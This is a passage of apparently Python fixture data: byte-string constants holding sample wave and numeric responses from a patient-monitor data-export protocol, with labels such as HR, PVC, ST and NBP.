b"\x20\x9e\x20\x95\x20\x8c\x20\x82\x20\x78\x20\x6e\x20\x63\x20\x59" \ b"\x20\x4f\x20\x45\x20\x3a\x20\x30\x20\x26\x20\x1c\x20\x12\x20\x08" \ b"\x1f\xff\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\xa0\x84\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfe\x20\x00\x20\x02\x20\x06\x20\x08\x20\x0b" \ b"\x20\x0e\x20\x10\x20\x13\x20\x17\x20\x18\x20\x1a\x20\x1d\x20\x20" \ b"\x20\x23\x20\x25\x20\x28\x20\x2b\x20\x2e\x20\x31\x20\x31\x20\x30" \ b"\x20\x2e\x20\x2d\x20\x2a\x20\x26\x20\x24\x20\x20\x20\x1f\x20\x1b" \ b"\x20\x19\x20\x15\x20\x14\x20\x10\x20\x0c\x20\x0a\x20\x08\x20\x04" \ b"\x20\x01\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\xa1\x04\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x20\x01\x20\x05\x20\x0b\x20\x11\x20\x15\x20\x1d\x20\x23" \ b"\x20\x29\x20\x31\x20\x37\x20\x3d\x20\x45\x20\x4d\x20\x53\x20\x59" \ b"\x20\x5f\x20\x67\x20\x6d\x20\x73\x20\x79\x20\x7b\x20\x79\x20\x75" \ b"\x20\x6f\x20\x67\x20\x61\x20\x5b\x20\x53\x20\x4d\x20\x43\x20\x3d" \ b"\x20\x35\x20\x2f\x20\x25\x20\x1f\x20\x19\x20\x11\x20\x09\x20\x03" \ b"\x1f\xfd\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00" \ b"\x00\x40\x0b\x7b\x0b\x9f\x0b\xbd\x0b\xd5\x0b\xe8\x0b\xf6\x0b\xfe" \ b"\x0c\x00\x0b\xfc\x0b\xf3\x0b\xe5\x0b\xd2\x0b\xba\x0b\x9d\x0b\x7b" \ b"\x0b\x56\x0b\x2c\x0b\x00\x0a\xd0\x0a\x9d\x0a\x68\x0a\x31\x09\xf9" \ b"\x09\xbf\x09\x85\x09\x4b\x09\x10\x08\xd7\x08\x9e\x08\x66\x08\x30" \ b"\x07\xfb" rsp_wave_7_no_4 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\xb0\x00\x04\x00\x07\x03\xaa\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x03\xa0\x00\x03\x00\x03\x0e\x80\x58\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x86\x00\x00\x00\x04" \ b"\x03\x80\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xf7\x1f\xf3\x1f\xf0\x1f\xee\x1f\xed\x1f\xed\x1f\xec" \ b"\x1f\xec\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xed" \ b"\x1f\xed\x1f\xed\x1f\xee\x1f\xee\x1f\xee\x1f\xee\x1f\xee\x1f\xee" \ b"\x1f\xee\x1f\xee\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef" \ b"\x1f\xef\x1f\xef\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0" \ b"\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf2\x1f\xf2\x1f\xf2" \ b"\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2" \ b"\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf4\x1f\xf4\x1f\xf4" \ b"\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4" \ b"\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf5\x1f\xf5\x1f\xf5" \ b"\x1f\xf4\x1f\xf3\x1f\xf3\x1f\xf2\x1f\xf1\x1f\xf0\x1f\xf0\x1f\xef" \ b"\x1f\xed\x1f\xed\x1f\xec\x1f\xeb\x1f\xea\x1f\xe9\x1f\xe8\x1f\xe7" \ b"\x1f\xe6\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x1f\xff\x1f\xfd\x1f\xfc\x1f\xfc\x1f\xfb\x1f\xfb\x1f\xfa" \ b"\x1f\xfa\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb" \ b"\x1f\xfb\x1f\xfb\x1f\xfa\x1f\xfa\x1f\xfa\x1f\xfa\x1f\xfa\x1f\xfa" \ b"\x1f\xfa\x1f\xfa\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb" \ b"\x1f\xfb\x1f\xfb\x1f\xfa\x1f\xfa\x1f\xfa\x1f\xfa\x1f\xfa\x1f\xfa" \ b"\x1f\xfa\x1f\xfa\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfb\x1f\xfb\x1f\xfb" \ b"\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb" \ b"\x1f\xfb\x1f\xfb\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfc\x1f\xfc\x1f\xfc" \ b"\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc" \ b"\x1f\xfc\x1f\xfc\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xff\x1f\xff\x1f\xff\x1f\xfe\x1f\xfe\x1f\xfe" \ b"\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe" \ b"\x1f\xfe\x1f\xfe\x20\x00\x20\x00\x20\x00\x1f\xff\x1f\xff\x1f\xff" \ b"\x20\x00\x1f\xff\x1f\xff\x1f\xfe\x1f\xfd\x1f\xfc\x1f\xfc\x1f\xfb" \ b"\x1f\xfb\x1f\xfb\x1f\xfa\x1f\xf9\x1f\xfa\x1f\xf9\x1f\xfa\x1f\xf9" \ b"\x1f\xf8\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x1f\xf7\x1f\xf5\x1f\xf3\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5" \ b"\x1f\xf5\x1f\xf5\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5" \ b"\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5" \ b"\x1f\xf5\x1f\xf5\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5" \ b"\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5" \ b"\x1f\xf5\x1f\xf5\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5" \ b"\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5" \ b"\x1f\xf5\x1f\xf5\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5" \ b"\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5" \ b"\x1f\xf5\x1f\xf5\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xef\x1f\xef\x1f\xed\x1f\xed" \ b"\x1f\xed\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00" \ b"\x00\x40\x07\xc9\x07\x99\x07\x6b\x07\x40\x07\x18\x06\xf3\x06\xd2" \ b"\x06\xb3\x06\x97\x06\x7f\x06\x69\x06\x57\x06\x47\x06\x3a\x06\x2f" \ b"\x06\x27\x06\x21\x06\x1d\x06\x1a\x06\x19\x06\x19\x06\x1a\x06\x1b" \ b"\x06\x1d\x06\x1e\x06\x20\x06\x20\x06\x20\x06\x1f\x06\x1d\x06\x1a" \ b"\x06\x15" rsp_nu_8_no_1 = \ b"\xe1\x00\x00\x02\x00\x05" \ b"\x04\x1c\x01\x01\x00\x01\x00\x07\x04\x14\x00\x21\x00\x00\x00\x00" \ b"\xf1\x3b\x04\x0a\x00\x01\x00\x00\x0e\x80\x8f\x00\xff\xff\xff\xff" \ b"\xff\xff\xff\xff\x00\x01\x00\x06\x00\x00\x00\x01\x03\xf0\x00\x00" \ b"\x00\x0a\x03\xea\x86\x3f\x00\x07\x00\x46\x09\x21\x00\x02\x86\x3f" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x58\x04" \ b"\x09\x27\x00\x10\x00\x0e\x00\x43\x00\x50\x00\x50\x00\x20\x00\x20" \ b"\x00\x20\x00\x00\x09\x17\x00\x02\x03\x00\x09\x11\x00\x02\x00\x05" \ b"\x86\x58\x00\x07\x00\x46\x09\x21\x00\x02\x86\x58\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\xe0\x18\x09\x27\x00\x10" \ b"\x00\x0e\x03\x94\x6e\x29\xfe\xff\x5e\xa6\xfe\xff\x00\x20\x00\x00" \ b"\x09\x17\x00\x02\x03\x01\x09\x11\x00\x02\x00\x02\x87\x8c\x00\x09" \ b"\x00\x5a\x09\x21\x00\x02\x87\x8c\x09\x2f\x00\x04\x00\x01\x00\x06" \ b"\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00" \ b"\x09\x24\x00\x04\x00\x02\x4b\xb8\x09\x27\x00\x10\x00\x0e\x00\x53" \ b"\x00\x70\x00\x4f\x20\x82\x00\x20\x00\x20\x00\x00\x09\x17\x00\x02" \ b"\x03\x00\x09\x11\x00\x02\x00\x06\xf0\x08\x00\x02\x06\xd1\x09\x50" \ b"\x00\x0a\x4b\xb8\x04\x00\x02\x20\xff\x00\x03\xb6\x87\x92\x00\x07" \ b"\x00\x4e\x09\x21\x00\x02\x87\x92\x09\x2f\x00\x04\x00\x01\x00\x06" \ b"\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00" \ b"\x09\x24\x00\x04\x00\x02\x48\x22\x09\x27\x00\x10\x00\x0e\x81\x09" \ b"\xfe\xff\x64\x0f\xfe\xff\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02" \ b"\x00\x06\x09\x50\x00\x0a\x48\x22\x04\x01\x0a\xa0\x00\x00\x00\x3c" \ b"\x87\x96\x00\x08\x00\x54\x09\x21\x00\x02\x87\x96\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x4b\xb0\x09\x27\x00\x10" \ b"\x00\x0e\x70\x4c\xfe\xff\x6c\xe8\xfe\xff\x00\x20\x00\x20\x00\x00" \ b"\x09\x17\x00\x02\x02\x01\x09\x11\x00\x02\x00\x06\x09\x50\x00\x0a" \ b"\x4b\xb0\x04\x00\x02\x00\xff\x00\x00\x64\x87\xe6\x00\x0a\x00\x82" \ b"\x09\x21\x00\x02\x87\xe6\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f" \ b"\x00\x0c\x00\x00\x20\x00\x00\x01\x52\x28\x01\x03\x00\x00\x09\x24" \ b"\x00\x04\x00\x02\x4a\x04\x09\x27\x00\x10\x00\x0e\x00\x4e\x00\x42" \ b"\x00\x50\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x01" \ b"\x09\x90\x00\x08\x20\x19\x03\x21\x16\x30\x43\x00\xf2\x37\x00\x04" \ b"\xff\xff\xff\xff\xf9\x98\x00\x04\xff\xff\xff\xff\x09\x4b\x00\x22" \ b"\x00\x03\x00\x1e\x4a\x05\x20\x00\x0f\x20\x00\x7f\xff\xff\x4a\x06" \ b"\x20\x00\x0f\x20\x00\x7f\xff\xff\x4a\x07\x20\x00\x0f\x20\x00\x7f" \ b"\xff\xff\x87\xe9\x00\x0a\x00\x68\x09\x21\x00\x02\x87\xe9\x09\x2f" \ b"\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01" \ b"\x52\x28\x00\x01\x00\x00\x09\x24\x00\x04\x00\x02\xf0\xe5\x09\x27" \ b"\x00\x10\x00\x0e\x81\x09\xfe\xff\x64\x0f\xfe\xff\x00\x20\x00\x20" \ b"\x00\x00\x09\x17\x00\x02\x03\x00\x09\x11\x00\x02\x00\x01\x09\x90" \ b"\x00\x08\x20\x19\x03\x21\x16\x30\x43\x00\xf9\x98\x00\x04\xff\xff" \ b"\xff\xff\x09\x50\x00\x0a\xf0\xe5\x20\x00\x0a\xa0\x00\x7f\xff\xff" \ b"\x88\x16\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x16\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x41\x82\x09\x27\x00\x10" \ b"\x00\x0e\x00\x48\x00\x52\x00\x20\x00\x20\x00\x20\x00\x20\x00\x00" \ b"\x09\x11\x00\x02\x00\x02\x09\x50\x00\x0a\x41\x82\x04\x00\x0a\xa0" \ b"\x00\x00\x00\x3c\x88\x1d\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x1d" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x50\x0a" \ b"\x09\x27\x00\x10\x00\x0e\x00\x52\x00\x52\x00\x20\x00\x20\x00\x20" \ b"\x00\x20\x00\x00\x09\x11\x00\x02\x00\x03\x09\x50\x00\x0a\x50\x0a" \ b"\x04\x00\x0a\xe0\x00\x00\x00\x0f\x88\x22\x00\x08\x00\xa0\x09\x21" \ b"\x00\x02\x88\x22\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x01\x42\x28\x01\x0c\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\x03\x00\x09\x27\x00\x10\x00\x0e\x00\x53\x00\x54\x00\x20" \ b"\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x09\x4b" \ b"\x00\x54\x00\x08\x00\x50\x03\x01\x84\x00\x05\x12\x00\x7f\xff\xff" \ b"\x03\x02\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x3d\x84\x00\x05\x12" \ b"\x00\x7f\xff\xff\x03\x3e\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x3f" \ b"\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x40\x84\x00\x05\x12\x00\x7f" \ b"\xff\xff\x03\x04\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x07\x84\x00" \ b"\x05\x12\x00\x7f\xff\xff\x09\x91\x00\x04\x0e\x7e\xf0\x00" rsp_nu_8_no_2 = \ b"\xe1\x00\x00\x02\x00\x05" \ b"\x02\x50\x03\x02\x00\x01\x00\x07\x02\x48\x00\x21\x00\x00\x00\x00" \ b"\xf1\x3b\x02\x3e\x00\x01\x00\x00\x0e\x80\x8f\x00\xff\xff\xff\xff" \ b"\xff\xff\xff\xff\x00\x01\x00\x06\x00\x00\x00\x01\x02\x24\x00\x00" \ b"\x00\x09\x02\x1e\x88\x28\x00\x03\x00\x1e\x09\x21\x00\x02\x88\x28" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x24\x00\x01\x0c\x00\x80\x88\x2a\x00\x06\x00\x40\x09\x21" \ b"\x00\x02\x88\x2a\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x05\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\xf0\x3d\x09\x27\x00\x10\x00\x0e\x00\x53\x00\x54\x63\x07" \ b"\xfe\xff\x65\x70\xfe\xff\x00\x00\x09\x11\x00\x02\x00\x02\x88\x2f" \ b"\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x2f\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00" \ b"\x00\x00\x09\x24\x00\x04\x00\x02\x42\x61\x09\x27\x00\x10\x00\x0e" \ b"\x00\x50\x00\x56\x00\x43\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11" \ b"\x00\x02\x00\x02\x09\x50\x00\x0a\x42\x61\x04\x00\x0a\xa0\x00\x00" \ b"\x00\x00\x88\x3c\x00\x06\x00\x40\x09\x21\x00\x02\x88\x3c\x09\x2f" \ b"\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01" \ b"\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x3f\x20\x09\x27" \ b"\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x20\x00\x20\x00\x20\x00\x20" \ b"\x00\x00\x09\x11\x00\x02\x00\x02\x88\x3e\x00\x06\x00\x40\x09\x21" \ b"\x00\x02\x88\x3e\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\x3f\x24\x09\x27\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x63" \ b"\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x88\x40" \ b"\x00\x06\x00\x40\x09\x21\x00\x02\x88\x40\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00" \ b"\x00\x00\x09\x24\x00\x04\x00\x02\xf1\x56\x09\x27\x00\x10\x00\x0e" \ b"\x03\x94\x00\x51\x00\x54\x00\x63\x00\x20\x00\x20\x00\x00\x09\x11" \ b"\x00\x02\x00\x02\x88\x42\x00\x06\x00\x40\x09\x21\x00\x02\x88\x42" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\xf1\x54" \ b"\x09\x27\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x2d\x00\x48\x00\x52" \ b"\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x88\x46\x00\x03\x00\x1e" \ b"\x09\x21\x00\x02\x88\x46\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f" \ b"\x00\x0c\x00\x00\x20\x00\x00\x01\x24\x00\x00\x00\x00\x80\x88\x48" \ b"\x00\x03\x00\x1e\x09\x21\x00\x02\x88\x48\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x24\x00\x00\x00" \ b"\x00\x80" rsp_nu_8_no_3 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x00\x2a\x00\x01\x00\x07\x00\x24\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x00\x1a\x00\x01\x00\x00\x0e\x80\x8f\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x06\x00\x00\x00\x00\x00\x00" rsp_wave_8_no_1 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x04\x58\x00\x04\x00\x07\x04\x52\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x04\x48\x00\x03\x00\x00\x0e\x80\x60\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x04\x2e\x00\x00\x00\x04" \ b"\x04\x28\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xe5\x1f\xe4\x1f\xe3\x1f\xe2\x1f\xe1\x1f\xe0\x1f\xdf" \ b"\x1f\xde\x1f\xdd\x1f\xdc\x1f\xdb\x1f\xda\x1f\xd9\x1f\xd8\x1f\xd8" \ b"\x1f\xd7\x1f\xd6\x1f\xd5\x1f\xd4\x1f\xd3\x1f\xd2\x1f\xd1\x1f\xd0" \ b"\x1f\xd0\x1f\xd0\x1f\xd1\x1f\xd3\x1f\xd4\x1f\xd5\x1f\xd7\x1f\xd8" \ b"\x1f\xd9\x1f\xdb\x1f\xdc\x1f\xde\x1f\xdf\x1f\xe0\x1f\xe2\x1f\xe3" \ b"\x1f\xe4\x1f\xe6\x1f\xe7\x1f\xe8\x1f\xe9\x1f\xeb\x1f\xec\x1f\xed" \ b"\x1f\xee\x1f\xf0\x1f\xf1\x1f\xf2\x1f\xf3\x1f\xf4\x1f\xf5\x1f\xf7" \ b"\x1f\xf8\x1f\xfa\x1f\xfb\x1f\xfc\x1f\xfc\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x08\x11\x00\x10\x01\xb2\x09\x21\x00\x02\x08\x11\x09\x2f" \ b"\x00\x04\x00\x01\x00\x09\x09\x3f\x00\x0c\x00\x00\x08\x00\x00\x01" \ b"\x42\x80\x00\x00\x00\x00\x09\x6d\x00\x06\x00\x80\x10\x0e\x30\x00" \ b"\x0a\x16\x00\x14\x00\x04\x00\x10\x00\x04\x80\x08\x00\x03\x40\x01" \ b"\x00\x02\x80\x04\x00\x05\x40\x02\x09\x8d\x00\x04\x00\x00\x00\x10" \ b"\x09\x24\x00\x04\x00\x02\x01\x01\x09\x27\x00\x10\x00\x0e\x00\x49" \ b"\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x00\x09\x96\x00\x02" \ b"\x10\xb2\x09\x45\x00\x02\x02\x40\x09\x11\x00\x02\x00\x02\x09\x40" \ b"\x00\x02\x00\x00\x09\x6f\x00\x0c\xfe\xff\xf0\x00\xfd\x00\x9f\xfb" \ b"\x00\x00\x3f\xff\x09\x64\x00\x10\x00\x00\x00\x00\x00\x00\x00\x01" \ b"\x1f\xad\x20\x75\x00\x00\x00\x00\x09\x6a\x00\x04\x1e\x81\x21\xa1" \ b"\x09\x6e\x01\x06\x01\x01\x04\x00\x01\x00\x1f\xf7\x1f\xf8\x1f\xf7" \ b"\x1f\xf8\x1f\xf7\x1f\xf8\x1f\xf7\x1f\xf6\x1f\xf7\x1f\xf6\x1f\xf7" \ b"\x1f\xf6\x1f\xf5\x1f\xf6\x1f\xf4\x1f\xf5\x1f\xf4\x1f\xf5\x1f\xf4" \ b"\x1f\xf5\x1f\xf4\x1f\xf5\x1f\xf6\x1f\xf6\x1f\xf6\x1f\xf7\x1f\xf5" \ b"\x1f\xf6\x1f\xf7\x1f\xf7\x1f\xf8\x1f\xf9\x1f\xf7\x1f\xf8\x1f\xf8" \ b"\x1f\xf9\x1f\xfa\x1f\xfa\x1f\xf9\x1f\xfa\x1f\xfa\x1f\xfb\x1f\xfc" \ b"\x1f\xfb\x1f\xfb\x1f\xfc\x1f\xfd\x1f\xfe\x1f\xfe\x1f\xfd\x1f\xfe" \ b"\x1f\xff\x20\x00\x1f\xff\x1f\xff\x20\x00\x20\x00\x1f\xff\x1f\xfe" \ b"\x20\x00\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ 